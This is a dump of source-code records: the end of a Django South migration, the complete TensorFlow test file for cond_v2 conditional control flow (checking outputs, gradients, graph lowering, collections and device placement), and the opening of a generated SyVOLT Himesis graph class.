'old_packageprofile': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'old_packageprofile'", 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': u"orm['deploy.packageprofile']"}),
'old_timeprofile': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'old_timeprofile'", 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': u"orm['deploy.timeprofile']"}),
'packageprofile': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['deploy.packageprofile']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'child'", 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': u"orm['inventory.entity']"}),
'timeprofile': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['deploy.timeprofile']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'})
}
}
complete_apps = ['configuration'] | gpl-2.0 | 1,402,998,412,544,026,400 | 77.788732 | 231 | 0.563332 | false |
asimshankar/tensorflow | tensorflow/python/kernel_tests/cond_v2_test.py | 1 | 35442 | # Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for cond_v2."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.core.protobuf import config_pb2
from tensorflow.python.eager import context
from tensorflow.python.eager import function
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_ops
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import cond_v2
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.ops import gradients_impl
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import tensor_array_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
from tensorflow.python.training import saver
from tensorflow.python.util import compat
class CondV2Test(test.TestCase):
def _testCond(self, true_fn, false_fn, train_vals, feed_dict=None):
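    """Checks cond_v2 against control_flow_ops.cond: compares outputs and
    gradients w.r.t. train_vals for both pred=True and pred=False."""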
if not feed_dict:
feed_dict = {}
with self.session(graph=ops.get_default_graph()) as sess:
pred = array_ops.placeholder(dtypes.bool, name="pred")
expected = control_flow_ops.cond(pred, true_fn, false_fn, name="expected")
actual = cond_v2.cond_v2(pred, true_fn, false_fn, name="actual")
expected_grad = gradients_impl.gradients(expected, train_vals)
actual_grad = gradients_impl.gradients(actual, train_vals)
sess_run_args = {pred: True}
sess_run_args.update(feed_dict)
expected_val, actual_val, expected_grad_val, actual_grad_val = sess.run(
(expected, actual, expected_grad, actual_grad), sess_run_args)
self.assertEqual(expected_val, actual_val)
self.assertEqual(expected_grad_val, actual_grad_val)
sess_run_args = {pred: False}
sess_run_args.update(feed_dict)
expected_val, actual_val, expected_grad_val, actual_grad_val = sess.run(
(expected, actual, expected_grad, actual_grad), sess_run_args)
self.assertEqual(expected_val, actual_val)
self.assertEqual(expected_grad_val, actual_grad_val)
@test_util.run_deprecated_v1
def testBasic(self):
x = constant_op.constant(1.0, name="x")
y = constant_op.constant(2.0, name="y")
def true_fn():
return x * 2.0
def false_fn():
return y * 3.0
self._testCond(true_fn, false_fn, [x])
self._testCond(true_fn, false_fn, [x, y])
self._testCond(true_fn, false_fn, [y])
@test_util.run_deprecated_v1
def testMultipleOutputs(self):
x = constant_op.constant(1.0, name="x")
y = constant_op.constant(3.0, name="y")
def true_fn():
return x * y, y
def false_fn():
return x, y * 3.0
self._testCond(true_fn, false_fn, [x])
self._testCond(true_fn, false_fn, [x, y])
self._testCond(true_fn, false_fn, [y])
@test_util.run_deprecated_v1
def testBasic2(self):
x = constant_op.constant(1.0, name="x")
y = constant_op.constant(2.0, name="y")
def true_fn():
return x * y * 2.0
def false_fn():
return 2.0
self._testCond(true_fn, false_fn, [x])
self._testCond(true_fn, false_fn, [x, y])
self._testCond(true_fn, false_fn, [y])
@test_util.run_deprecated_v1
def testNoInputs(self):
with self.cached_session() as sess:
pred = array_ops.placeholder(dtypes.bool, name="pred")
def true_fn():
return constant_op.constant(1.0)
def false_fn():
return constant_op.constant(2.0)
out = cond_v2.cond_v2(pred, true_fn, false_fn)
self.assertEqual(sess.run(out, {pred: True}), (1.0,))
self.assertEqual(sess.run(out, {pred: False}), (2.0,))
def _createCond(self, name):
"""Creates a cond_v2 call and returns the output tensor and the cond op."""
pred = constant_op.constant(True, name="pred")
x = constant_op.constant(1.0, name="x")
def true_fn():
return x
def false_fn():
return x + 1
output = cond_v2.cond_v2(pred, true_fn, false_fn, name=name)
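    # cond_v2 does not return the If op's output directly; step through
    # output.op.inputs[0] to reach the underlying If op (asserted below).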
cond_op = output.op.inputs[0].op
self.assertEqual(cond_op.type, "If")
return output, cond_op
def testDefaultName(self):
with ops.Graph().as_default():
_, cond_op = self._createCond(None)
self.assertEqual(cond_op.name, "cond")
self.assertRegexpMatches(
cond_op.get_attr("then_branch").name, r"cond_true_\d*")
self.assertRegexpMatches(
cond_op.get_attr("else_branch").name, r"cond_false_\d*")
with ops.Graph().as_default():
with ops.name_scope("foo"):
_, cond1_op = self._createCond("")
self.assertEqual(cond1_op.name, "foo/cond")
self.assertRegexpMatches(
cond1_op.get_attr("then_branch").name, r"foo_cond_true_\d*")
self.assertRegexpMatches(
cond1_op.get_attr("else_branch").name, r"foo_cond_false_\d*")
_, cond2_op = self._createCond(None)
self.assertEqual(cond2_op.name, "foo/cond_1")
self.assertRegexpMatches(
cond2_op.get_attr("then_branch").name, r"foo_cond_1_true_\d*")
self.assertRegexpMatches(
cond2_op.get_attr("else_branch").name, r"foo_cond_1_false_\d*")
@test_util.run_v1_only("b/120545219")
def testDefunInCond(self):
x = constant_op.constant(1.0, name="x")
y = constant_op.constant(2.0, name="y")
def true_fn():
@function.defun
def fn():
return x * y * 2.0
return fn()
def false_fn():
return 2.0
self._testCond(true_fn, false_fn, [x])
self._testCond(true_fn, false_fn, [x, y])
self._testCond(true_fn, false_fn, [y])
@test_util.run_deprecated_v1
def testNestedDefunInCond(self):
x = constant_op.constant(1.0, name="x")
y = constant_op.constant(2.0, name="y")
def true_fn():
return 2.0
def false_fn():
@function.defun
def fn():
@function.defun
def nested_fn():
return x * y * 2.0
return nested_fn()
return fn()
self._testCond(true_fn, false_fn, [x])
self._testCond(true_fn, false_fn, [x, y])
self._testCond(true_fn, false_fn, [y])
@test_util.run_deprecated_v1
def testDoubleNestedDefunInCond(self):
x = constant_op.constant(1.0, name="x")
y = constant_op.constant(2.0, name="y")
def true_fn():
@function.defun
def fn():
@function.defun
def nested_fn():
@function.defun
def nested_nested_fn():
return x * y * 2.0
return nested_nested_fn()
return nested_fn()
return fn()
def false_fn():
return 2.0
self._testCond(true_fn, false_fn, [x])
self._testCond(true_fn, false_fn, [x, y])
self._testCond(true_fn, false_fn, [y])
def testNestedCond(self):
def run_test(pred_value):
def build_graph():
pred = array_ops.placeholder(dtypes.bool, name="pred")
x = constant_op.constant(1.0, name="x")
y = constant_op.constant(2.0, name="y")
def true_fn():
return 2.0
def false_fn():
def false_true_fn():
return x * y * 2.0
def false_false_fn():
return x * 5.0
return _cond(pred, false_true_fn, false_false_fn, "inside_false_fn")
return x, y, pred, true_fn, false_fn
with ops.Graph().as_default():
x, y, pred, true_fn, false_fn = build_graph()
self._testCond(true_fn, false_fn, [x, y], {pred: pred_value})
self._testCond(true_fn, false_fn, [x], {pred: pred_value})
self._testCond(true_fn, false_fn, [y], {pred: pred_value})
run_test(True)
run_test(False)
def testNestedCondBothBranches(self):
def run_test(pred_value):
def build_graph():
pred = array_ops.placeholder(dtypes.bool, name="pred")
x = constant_op.constant(1.0, name="x")
y = constant_op.constant(2.0, name="y")
def true_fn():
return _cond(pred, lambda: x + y, lambda: x * x, name=None)
def false_fn():
return _cond(pred, lambda: x - y, lambda: y * y, name=None)
return x, y, pred, true_fn, false_fn
with ops.Graph().as_default():
x, y, pred, true_fn, false_fn = build_graph()
self._testCond(true_fn, false_fn, [x, y], {pred: pred_value})
self._testCond(true_fn, false_fn, [x], {pred: pred_value})
self._testCond(true_fn, false_fn, [y], {pred: pred_value})
run_test(True)
run_test(False)
def testDoubleNestedCond(self):
def run_test(pred1_value, pred2_value):
def build_graph():
pred1 = array_ops.placeholder(dtypes.bool, name="pred1")
pred2 = array_ops.placeholder(dtypes.bool, name="pred2")
x = constant_op.constant(1.0, name="x")
y = constant_op.constant(2.0, name="y")
def true_fn():
return 2.0
def false_fn():
def false_true_fn():
def false_true_true_fn():
return x * y * 2.0
def false_true_false_fn():
return x * 10.0
return _cond(
pred1,
false_true_true_fn,
false_true_false_fn,
name="inside_false_true_fn")
def false_false_fn():
return x * 5.0
return _cond(
pred2, false_true_fn, false_false_fn, name="inside_false_fn")
return x, y, pred1, pred2, true_fn, false_fn
with ops.Graph().as_default():
x, y, pred1, pred2, true_fn, false_fn = build_graph()
self._testCond(true_fn, false_fn, [x, y], {
pred1: pred1_value,
pred2: pred2_value
})
x, y, pred1, pred2, true_fn, false_fn = build_graph()
self._testCond(true_fn, false_fn, [x], {
pred1: pred1_value,
pred2: pred2_value
})
x, y, pred1, pred2, true_fn, false_fn = build_graph()
self._testCond(true_fn, false_fn, [y], {
pred1: pred1_value,
pred2: pred2_value
})
run_test(True, True)
run_test(True, False)
run_test(False, False)
run_test(False, True)
def testGradientFromInsideDefun(self):
def build_graph():
pred_outer = array_ops.placeholder(dtypes.bool, name="pred_outer")
pred_inner = array_ops.placeholder(dtypes.bool, name="pred_inner")
x = constant_op.constant(1.0, name="x")
y = constant_op.constant(2.0, name="y")
def true_fn():
return 2.0
def false_fn():
def inner_true_fn():
return x * y * 2.0
def inner_false_fn():
return x * 5.0
return cond_v2.cond_v2(
pred_inner, inner_true_fn, inner_false_fn, name="inner_cond")
cond_outer = cond_v2.cond_v2(
pred_outer, true_fn, false_fn, name="outer_cond")
# Compute grads inside a Defun.
@function.defun
def nesting_fn():
return gradients_impl.gradients(cond_outer, [x, y])
grads = nesting_fn()
return grads, pred_outer, pred_inner
with ops.Graph().as_default():
grads, pred_outer, pred_inner = build_graph()
with self.session(graph=ops.get_default_graph()) as sess:
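        # Expected values: the outer true branch is a constant (grads 0, 0);
        # the inner true branch is 2*x*y (grads 2*y=4, 2*x=2); the inner
        # false branch is 5*x (grads 5, 0).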
self.assertSequenceEqual(
sess.run(grads, {
pred_outer: True,
pred_inner: True
}), [0., 0.])
self.assertSequenceEqual(
sess.run(grads, {
pred_outer: True,
pred_inner: False
}), [0., 0.])
self.assertSequenceEqual(
sess.run(grads, {
pred_outer: False,
pred_inner: True
}), [4., 2.])
self.assertSequenceEqual(
sess.run(grads, {
pred_outer: False,
pred_inner: False
}), [5., 0.])
def testGradientFromInsideNestedDefun(self):
def build_graph():
pred_outer = array_ops.placeholder(dtypes.bool, name="pred_outer")
pred_inner = array_ops.placeholder(dtypes.bool, name="pred_inner")
x = constant_op.constant(1.0, name="x")
y = constant_op.constant(2.0, name="y")
def true_fn():
return 2.0
def false_fn():
def inner_true_fn():
return x * y * 2.0
def inner_false_fn():
return x * 5.0
return cond_v2.cond_v2(
pred_inner, inner_true_fn, inner_false_fn, name="inner_cond")
cond_outer = cond_v2.cond_v2(
pred_outer, true_fn, false_fn, name="outer_cond")
# Compute grads inside a Defun.
@function.defun
def nesting_fn():
@function.defun
def inner_nesting_fn():
return gradients_impl.gradients(cond_outer, [x, y])
return inner_nesting_fn()
grads = nesting_fn()
return grads, pred_outer, pred_inner
with ops.Graph().as_default():
grads, pred_outer, pred_inner = build_graph()
with self.session(graph=ops.get_default_graph()) as sess:
self.assertSequenceEqual(
sess.run(grads, {
pred_outer: True,
pred_inner: True
}), [0., 0.])
self.assertSequenceEqual(
sess.run(grads, {
pred_outer: True,
pred_inner: False
}), [0., 0.])
self.assertSequenceEqual(
sess.run(grads, {
pred_outer: False,
pred_inner: True
}), [4., 2.])
self.assertSequenceEqual(
sess.run(grads, {
pred_outer: False,
pred_inner: False
}), [5., 0.])
def testBuildCondAndGradientInsideDefun(self):
def build_graph():
pred_outer = array_ops.placeholder(dtypes.bool, name="pred_outer")
pred_inner = array_ops.placeholder(dtypes.bool, name="pred_inner")
x = constant_op.constant(1.0, name="x")
y = constant_op.constant(2.0, name="y")
# Build cond and its gradient inside a Defun.
@function.defun
def fn():
def true_fn():
return 2.0
def false_fn():
def inner_true_fn():
return x * y * 2.0
def inner_false_fn():
return x * 5.0
return cond_v2.cond_v2(
pred_inner, inner_true_fn, inner_false_fn, name="inner_cond")
cond_outer = cond_v2.cond_v2(
pred_outer, true_fn, false_fn, name="outer_cond")
return gradients_impl.gradients(cond_outer, [x, y])
grads = fn()
return grads, pred_outer, pred_inner
with ops.Graph().as_default(), self.session(
graph=ops.get_default_graph()) as sess:
grads, pred_outer, pred_inner = build_graph()
self.assertSequenceEqual(
sess.run(grads, {
pred_outer: True,
pred_inner: True
}), [0., 0.])
self.assertSequenceEqual(
sess.run(grads, {
pred_outer: True,
pred_inner: False
}), [0., 0.])
self.assertSequenceEqual(
sess.run(grads, {
pred_outer: False,
pred_inner: True
}), [4., 2.])
self.assertSequenceEqual(
sess.run(grads, {
pred_outer: False,
pred_inner: False
}), [5., 0.])
@test_util.run_deprecated_v1
def testSecondDerivative(self):
with self.cached_session() as sess:
pred = array_ops.placeholder(dtypes.bool, name="pred")
x = constant_op.constant(3.0, name="x")
def true_fn():
return math_ops.pow(x, 3)
def false_fn():
return x
cond = cond_v2.cond_v2(pred, true_fn, false_fn, name="cond")
cond_grad = gradients_impl.gradients(cond, [x])
cond_grad_grad = gradients_impl.gradients(cond_grad, [x])
# d[x^3]/dx = 3x^2
true_val = sess.run(cond_grad, {pred: True})
self.assertEqual(true_val, [27.0])
# d[x]/dx = 1
false_val = sess.run(cond_grad, {pred: False})
self.assertEqual(false_val, [1.0])
true_val = sess.run(cond_grad_grad, {pred: True})
# d2[x^3]/dx2 = 6x
self.assertEqual(true_val, [18.0])
false_val = sess.run(cond_grad_grad, {pred: False})
# d2[x]/dx2 = 0
self.assertEqual(false_val, [0.0])
def testGradientOfDeserializedCond(self):
with ops.Graph().as_default():
pred = array_ops.placeholder(dtypes.bool, name="pred")
x = constant_op.constant(3.0, name="x")
ops.add_to_collection("x", x)
def true_fn():
return math_ops.pow(x, 3)
def false_fn():
return x
ops.add_to_collection("pred", pred)
cond = cond_v2.cond_v2(pred, true_fn, false_fn, name="cond")
ops.add_to_collection("cond", cond)
meta_graph = saver.export_meta_graph()
with ops.Graph().as_default() as g:
with self.session(graph=g) as sess:
saver.import_meta_graph(meta_graph)
x = ops.get_collection("x")[0]
pred = ops.get_collection("pred")[0]
cond = ops.get_collection("cond")
cond_grad = gradients_impl.gradients(cond, [x], name="cond_grad")
cond_grad_grad = gradients_impl.gradients(
cond_grad, [x], name="cond_grad_grad")
# d[x^3]/dx = 3x^2
true_val = sess.run(cond_grad, {pred: True})
self.assertEqual(true_val, [27.0])
# d[x]/dx = 1
false_val = sess.run(cond_grad, {pred: False})
self.assertEqual(false_val, [1.0])
true_val = sess.run(cond_grad_grad, {pred: True})
# d2[x^3]/dx2 = 6x
self.assertEqual(true_val, [18.0])
false_val = sess.run(cond_grad_grad, {pred: False})
# d2[x]/dx2 = 0
self.assertEqual(false_val, [0.0])
def testLowering(self):
with ops.Graph().as_default() as g:
with self.session(graph=g) as sess:
cond_output, _ = self._createCond("cond")
run_options = config_pb2.RunOptions(output_partition_graphs=True)
run_metadata = config_pb2.RunMetadata()
sess.run(cond_output, options=run_options, run_metadata=run_metadata)
# If lowering was enabled, there should be a `Switch` node
switch_found = any(
any(node.op == "Switch" for node in graph.node)
for graph in run_metadata.partition_graphs
)
self.assertTrue(switch_found,
"A `Switch` op should exist if the graph was lowered.")
# If lowering was enabled, there should be no `If` node
if_found = any(
any(node.op == "If" for node in graph.node)
for graph in run_metadata.partition_graphs
)
self.assertFalse(if_found,
"An `If` op was found, but it should be lowered.")
@test_util.run_deprecated_v1
def testLoweringDisabledInXLA(self):
with self.session(graph=ops.Graph()) as sess:
# Build the cond_v2 in an XLA context
xla_context = control_flow_ops.XLAControlFlowContext()
xla_context.Enter()
cond_output, _ = self._createCond("cond")
xla_context.Exit()
run_options = config_pb2.RunOptions(output_partition_graphs=True)
run_metadata = config_pb2.RunMetadata()
sess.run(cond_output, options=run_options, run_metadata=run_metadata)
# Lowering disabled in XLA, there should be no `Switch` node
switch_found = any(
any(node.op == "Switch" for node in graph.node)
for graph in run_metadata.partition_graphs
)
self.assertFalse(
switch_found,
"A `Switch` op exists, but the graph should not be lowered.")
# Lowering disabled in XLA, there should still be an `If` node
if_found = any(
any(node.op == "If" for node in graph.node)
for graph in run_metadata.partition_graphs
)
self.assertTrue(
if_found,
"An `If` op was not found, but the graph should not be lowered.")
@test_util.run_deprecated_v1
def testLoweringDisabledWithSingleThreadedExecutorContext(self):
with self.session(graph=ops.Graph()) as sess:
@function.defun
def _add_cond(x):
return cond_v2.cond_v2(
constant_op.constant(True, name="pred"),
lambda: x,
lambda: x + 1)
x = array_ops.placeholder(shape=None, dtype=dtypes.float32)
with context.function_executor_type("SINGLE_THREADED_EXECUTOR"):
out_cond = _add_cond(x)
# The fact that sess.run() succeeds means lowering is disabled, because
# the single threaded executor does not support cond v1 ops.
sess.run(out_cond, feed_dict={x: 1.0})
@test_util.enable_control_flow_v2
def testStructuredOutputs(self):
x = constant_op.constant(1.0, name="x")
y = constant_op.constant(3.0, name="y")
def true_fn():
return ((x * y,), y)
def false_fn():
return ((x,), y * 3.0)
output = control_flow_ops.cond(
constant_op.constant(False), true_fn, false_fn)
self.assertEqual(self.evaluate(output[0][0]), 1.)
self.assertEqual(self.evaluate(output[1]), 9.)
@test_util.enable_control_flow_v2
@test_util.run_deprecated_v1
def testRaisesOutputStructuresMismatch(self):
x = constant_op.constant(1.0, name="x")
y = constant_op.constant(3.0, name="y")
def true_fn():
return x * y, y
def false_fn():
return ((x,), y * 3.0)
with self.assertRaisesRegexp(
ValueError, "Outputs of true_fn and false_fn must"
" have the same structure"):
control_flow_ops.cond(constant_op.constant(False), true_fn, false_fn)
@test_util.enable_control_flow_v2
def testCondAndTensorArray(self):
x = math_ops.range(-5, 5)
output = tensor_array_ops.TensorArray(dtype=dtypes.int32, size=x.shape[0])
def loop_body(i, output):
def if_true():
return output.write(i, x[i]**2)
def if_false():
return output.write(i, x[i])
output = control_flow_ops.cond(x[i] > 0, if_true, if_false)
return i + 1, output
_, output = control_flow_ops.while_loop(
lambda i, arr: i < x.shape[0],
loop_body,
loop_vars=(constant_op.constant(0), output))
output_t = output.stack()
self.assertAllEqual(
self.evaluate(output_t), [-5, -4, -3, -2, -1, 0, 1, 4, 9, 16])
@test_util.enable_control_flow_v2
def testCondAndTensorArrayInDefun(self):
@function.defun
def f():
x = math_ops.range(-5, 5)
output = tensor_array_ops.TensorArray(dtype=dtypes.int32, size=x.shape[0])
def loop_body(i, output):
def if_true():
return output.write(i, x[i]**2)
def if_false():
return output.write(i, x[i])
output = control_flow_ops.cond(x[i] > 0, if_true, if_false)
return i + 1, output
_, output = control_flow_ops.while_loop(
lambda i, arr: i < x.shape[0],
loop_body,
loop_vars=(constant_op.constant(0), output))
return output.stack()
output_t = f()
self.assertAllEqual(
self.evaluate(output_t), [-5, -4, -3, -2, -1, 0, 1, 4, 9, 16])
@test_util.run_deprecated_v1
def testForwardPassRewrite(self):
x = constant_op.constant(1.0, name="x")
output = cond_v2.cond_v2(constant_op.constant(True),
lambda: x * 2.0,
lambda: x)
if_op = output.op.inputs[0].op
self.assertEqual(if_op.type, "If")
# pylint: disable=g-deprecated-assert
self.assertEqual(len(if_op.outputs), 1)
gradients_impl.gradients(output, x)
# if_op should have been rewritten to output 2.0 intermediate.
self.assertEqual(len(if_op.outputs), 2)
gradients_impl.gradients(output, x)
# Computing the gradient again shouldn't rewrite if_op again.
self.assertEqual(len(if_op.outputs), 2)
# pylint: enable=g-deprecated-assert
class CondV2CollectionTest(test.TestCase):
def testCollectionIntValueAccessInCond(self):
"""Read values from graph collections inside of cond_v2."""
with ops.Graph().as_default() as g:
with self.session(graph=g):
x = 2
y = 5
ops.add_to_collection("x", x)
ops.add_to_collection("y", y)
def fn():
x_const = constant_op.constant(ops.get_collection("x")[0])
y_const = constant_op.constant(ops.get_collection("y")[0])
return math_ops.add(x_const, y_const)
cnd = cond_v2.cond_v2(constant_op.constant(True), fn, fn)
self.assertEquals(cnd.eval(), 7)
def testCollectionTensorValueAccessInCond(self):
"""Read tensors from collections inside of cond_v2 & use them."""
with ops.Graph().as_default() as g:
with self.session(graph=g):
x = constant_op.constant(2)
y = constant_op.constant(5)
ops.add_to_collection("x", x)
ops.add_to_collection("y", y)
def fn():
x_read = ops.get_collection("x")[0]
y_read = ops.get_collection("y")[0]
return math_ops.add(x_read, y_read)
cnd = cond_v2.cond_v2(math_ops.less(x, y), fn, fn)
self.assertEquals(cnd.eval(), 7)
def testCollectionIntValueWriteInCond(self):
"""Make sure Int writes to collections work inside of cond_v2."""
with ops.Graph().as_default() as g:
with self.session(graph=g):
x = constant_op.constant(2)
y = constant_op.constant(5)
def true_fn():
z = math_ops.add(x, y)
ops.add_to_collection("z", 7)
return math_ops.mul(x, z)
def false_fn():
z = math_ops.add(x, y)
return math_ops.mul(x, z)
cnd = cond_v2.cond_v2(constant_op.constant(True), true_fn, false_fn)
self.assertEquals(cnd.eval(), 14)
read_z_collection = ops.get_collection("z")
self.assertEquals(read_z_collection, [7])
class CondV2ContainerTest(test.TestCase):
def testContainer(self):
"""Set containers outside & inside of cond_v2.
Make sure the containers are set correctly for both variable creation
(tested by variables.Variable) and for stateful ops (tested by FIFOQueue)
"""
self.skipTest("b/113048653")
with ops.Graph().as_default() as g:
with self.session(graph=g):
v0 = variables.Variable([0])
q0 = data_flow_ops.FIFOQueue(1, dtypes.float32)
def container(node):
return node.op.get_attr("container")
self.assertEqual(compat.as_bytes(""), container(v0))
self.assertEqual(compat.as_bytes(""), container(q0.queue_ref))
def true_fn():
# When this branch is created in cond below,
# the container should begin with 'l1'
v1 = variables.Variable([1])
q1 = data_flow_ops.FIFOQueue(1, dtypes.float32)
with ops.container("l2t"):
v2 = variables.Variable([2])
q2 = data_flow_ops.FIFOQueue(1, dtypes.float32)
v3 = variables.Variable([1])
q3 = data_flow_ops.FIFOQueue(1, dtypes.float32)
self.assertEqual(compat.as_bytes("l1"), container(v1))
self.assertEqual(compat.as_bytes("l1"), container(q1.queue_ref))
self.assertEqual(compat.as_bytes("l2t"), container(v2))
self.assertEqual(compat.as_bytes("l2t"), container(q2.queue_ref))
self.assertEqual(compat.as_bytes("l1"), container(v3))
self.assertEqual(compat.as_bytes("l1"), container(q3.queue_ref))
return constant_op.constant(2.0)
def false_fn():
# When this branch is created in cond below,
# the container should begin with 'l1'
v1 = variables.Variable([1])
q1 = data_flow_ops.FIFOQueue(1, dtypes.float32)
with ops.container("l2f"):
v2 = variables.Variable([2])
q2 = data_flow_ops.FIFOQueue(1, dtypes.float32)
v3 = variables.Variable([1])
q3 = data_flow_ops.FIFOQueue(1, dtypes.float32)
self.assertEqual(compat.as_bytes("l1"), container(v1))
self.assertEqual(compat.as_bytes("l1"), container(q1.queue_ref))
self.assertEqual(compat.as_bytes("l2f"), container(v2))
self.assertEqual(compat.as_bytes("l2f"), container(q2.queue_ref))
self.assertEqual(compat.as_bytes("l1"), container(v3))
self.assertEqual(compat.as_bytes("l1"), container(q3.queue_ref))
return constant_op.constant(6.0)
with ops.container("l1"):
cnd_true = cond_v2.cond_v2(
constant_op.constant(True), true_fn, false_fn)
self.assertEquals(cnd_true.eval(), 2)
cnd_false = cond_v2.cond_v2(
constant_op.constant(False), true_fn, false_fn)
self.assertEquals(cnd_false.eval(), 6)
v4 = variables.Variable([3])
q4 = data_flow_ops.FIFOQueue(1, dtypes.float32)
v5 = variables.Variable([4])
q5 = data_flow_ops.FIFOQueue(1, dtypes.float32)
self.assertEqual(compat.as_bytes("l1"), container(v4))
self.assertEqual(compat.as_bytes("l1"), container(q4.queue_ref))
self.assertEqual(compat.as_bytes(""), container(v5))
self.assertEqual(compat.as_bytes(""), container(q5.queue_ref))
class CondV2ColocationGroupAndDeviceTest(test.TestCase):
def testColocateWithBeforeCond(self):
with ops.Graph().as_default() as g:
with self.session(graph=g):
a = constant_op.constant([2.0], name="a")
b = constant_op.constant([2.0], name="b")
def fn():
c = constant_op.constant(3.0)
self.assertEqual([b"loc:@a"], c.op.colocation_groups())
return c
with ops.colocate_with(a.op):
self.assertEquals(
cond_v2.cond_v2(constant_op.constant(True), fn, fn).eval(), 3)
def fn2():
c = constant_op.constant(3.0)
self.assertEqual([b"loc:@a", b"loc:@b"], c.op.colocation_groups())
return c
with ops.colocate_with(a.op):
with ops.colocate_with(b.op):
self.assertEquals(
cond_v2.cond_v2(constant_op.constant(True), fn2, fn2).eval(), 3)
def testColocateWithInAndOutOfCond(self):
with ops.Graph().as_default() as g:
with self.session(graph=g):
a = constant_op.constant([2.0], name="a")
b = constant_op.constant([2.0], name="b")
def fn2():
with ops.colocate_with(b.op):
c = constant_op.constant(3.0)
self.assertEqual([b"loc:@a", b"loc:@b"], c.op.colocation_groups())
return c
with ops.colocate_with(a.op):
self.assertEquals(
cond_v2.cond_v2(constant_op.constant(True), fn2, fn2).eval(), 3)
d = constant_op.constant([2.0], name="d")
self.assertEqual([b"loc:@a"], d.op.colocation_groups())
def testColocateWithInCondGraphPartitioning(self):
with ops.Graph().as_default() as g:
with self.session(
graph=g,
config=config_pb2.ConfigProto(device_count={"CPU": 2})
) as sess:
with ops.device("/device:CPU:0"):
a = constant_op.constant([2.0], name="a")
with ops.device("/device:CPU:1"):
b = constant_op.constant([2.0], name="b")
def fn():
with ops.colocate_with(b.op):
c = math_ops.add(a, a, name="c")
return c
out_cond_2 = cond_v2.cond_v2(constant_op.constant(True), fn, fn)
run_options = config_pb2.RunOptions(output_partition_graphs=True)
run_metadata = config_pb2.RunMetadata()
sess.run(out_cond_2, options=run_options, run_metadata=run_metadata)
# We expect there to be two partitions because of the
# colocate_with. We are only running the cond, which has a data
# dependency on `a` but not on `b`. So, without the colocate_with
# we would expect execution on just one device.
self.assertTrue(len(run_metadata.partition_graphs) >= 2)
def testDeviceBeforeCond(self):
with ops.Graph().as_default() as g:
with self.session(graph=g):
def fn():
self.assertEqual("", constant_op.constant(3.0).op.device)
return test_ops.device_placement_op()
with ops.device("/device:CPU:0"):
self.assertIn(
compat.as_bytes("CPU:0"),
self.evaluate(cond_v2.cond_v2(constant_op.constant(True),
fn, fn)))
def fn2():
self.assertEqual("", constant_op.constant(3.0).op.device)
return test_ops.device_placement_op()
if test_util.is_gpu_available():
with ops.device("/device:GPU:0"):
self.assertIn(
compat.as_bytes("GPU:0"),
self.evaluate(cond_v2.cond_v2(constant_op.constant(True),
fn2, fn2)))
else:
self.skipTest("Test requrires a GPU to check GPU device placement.")
def testDeviceInAndOutOfCond(self):
with ops.Graph().as_default() as g:
with self.session(
graph=g, config=config_pb2.ConfigProto(device_count={"CPU": 2})):
def fn2():
with ops.device("/device:CPU:1"):
c = constant_op.constant(3.0)
self.assertEqual("/device:CPU:1", c.op.device)
return c
with ops.device("/device:CPU:0"):
self.assertEquals(
cond_v2.cond_v2(constant_op.constant(True), fn2, fn2).eval(), 3)
d = constant_op.constant(4.0)
self.assertEqual("/device:CPU:0", d.op.device)
def testDeviceInCondGraphPartitioning(self):
with ops.Graph().as_default() as g:
with self.session(
graph=g,
config=config_pb2.ConfigProto(device_count={"CPU": 2})
) as sess:
def fn():
with ops.device("/device:CPU:1"):
c = math_ops.add(a, a, name="c")
return c
with ops.device("/device:CPU:0"):
a = constant_op.constant([2.0], name="a")
out_cond_2 = cond_v2.cond_v2(constant_op.constant(True), fn, fn)
run_options = config_pb2.RunOptions(output_partition_graphs=True)
run_metadata = config_pb2.RunMetadata()
sess.run(out_cond_2, options=run_options, run_metadata=run_metadata)
self.assertTrue(len(run_metadata.partition_graphs) >= 2)
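# Test helpers: build a nested cond with the legacy implementation when a v1
# CondContext is already active on the default graph, otherwise use cond_v2.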
def _cond(pred, true_fn, false_fn, name):
if _is_old_cond():
return control_flow_ops.cond(pred, true_fn, false_fn, name=name)
else:
return cond_v2.cond_v2(pred, true_fn, false_fn, name=name)
def _is_old_cond():
return isinstance(ops.get_default_graph()._get_control_flow_context(),
control_flow_ops.CondContext)
if __name__ == "__main__":
test.main()
| apache-2.0 | 3,045,569,778,192,330,000 | 31.249318 | 80 | 0.587834 | false |
levilucio/SyVOLT | ECore_Copier_MM/transformation-Large/HeattributeOUTeGenericTypeSolveRefEAttributeEGenericTypeEAttributeEGenericType.py | 1 | 5089 |
from core.himesis import Himesis
class HeattributeOUTeGenericTypeSolveRefEAttributeEGenericTypeEAttributeEGenericType(Himesis):
def __init__(self):
"""
Creates the himesis graph representing the AToM3 model HeattributeOUTeGenericTypeSolveRefEAttributeEGenericTypeEAttributeEGenericType.
"""
# Flag this instance as compiled now
self.is_compiled = True
super(HeattributeOUTeGenericTypeSolveRefEAttributeEGenericTypeEAttributeEGenericType, self).__init__(name='HeattributeOUTeGenericTypeSolveRefEAttributeEGenericTypeEAttributeEGenericType', num_nodes=27, edges=[])
# Add the edges
